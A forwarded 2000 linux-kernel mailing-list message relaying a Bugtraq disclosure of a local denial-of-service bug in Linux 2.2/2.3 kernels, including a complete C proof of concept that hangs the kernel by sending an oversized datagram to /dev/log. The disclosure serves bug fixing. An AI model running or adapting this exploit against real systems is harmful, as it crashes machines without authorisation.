From: "Enri" <mccoy@smc.it> To: <linux-kernel@vger.rutgers.edu> Subject: Fw: Local Denial-of-Service attack against Linux Date: Fri, 24 Mar 2000 15:29:03 +0100 ----- Original Message ----- From: Jay Fenlason <fenlason@CLEARWAY.COM> To: <BUGTRAQ@SECURITYFOCUS.COM> Sent: Thursday, March 23, 2000 11:55 PM Subject: Local Denial-of-Service attack against Linux > This amusing little program will hang Linux 2.2.12 (default Red Hat 6.1), > 2.2.14 (latest stable kernel) and 2.3.99-pre2 (latest development kernel) > on my 6x86 scratch machine and our various Pentium development machines. > Note that this does not require any special privileges. > > The send system call immediately puts the kernel in a loop spewing > kmalloc: Size (131076) too large > forever (or until you hit the reset button). > > Apparently unix domain sockets are ignoring the /proc/sys/net/core/wmem_max > parameter, despite the documentation to the contrary. The fix should be > simple, but I haven't had time to chase it down, and I'm not (usually) a > Linux kernel developer. > > -- JF > > --- BEGIN INCLUDED SOURCE FILE --- > > #include <sys/types.h> > #include <sys/socket.h> > #include <string.h> > > char buf[128 * 1024]; > > int main ( int argc, char **argv ) > { > struct sockaddr SyslogAddr; > int LogFile; > int bufsize = sizeof(buf)-5; > int i; > > for ( i = 0; i < bufsize; i++ ) > buf[i] = ' '+(i%95); > buf[i] = '\0'; > > SyslogAddr.sa_family = AF_UNIX; > strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_data) ); > LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 ); > sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr) ); > return 0; > } > --- END INCLUDED SOURCE FILE --- > - To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.rutgers.edu Please read the FAQ at http://www.tux.org/lkml/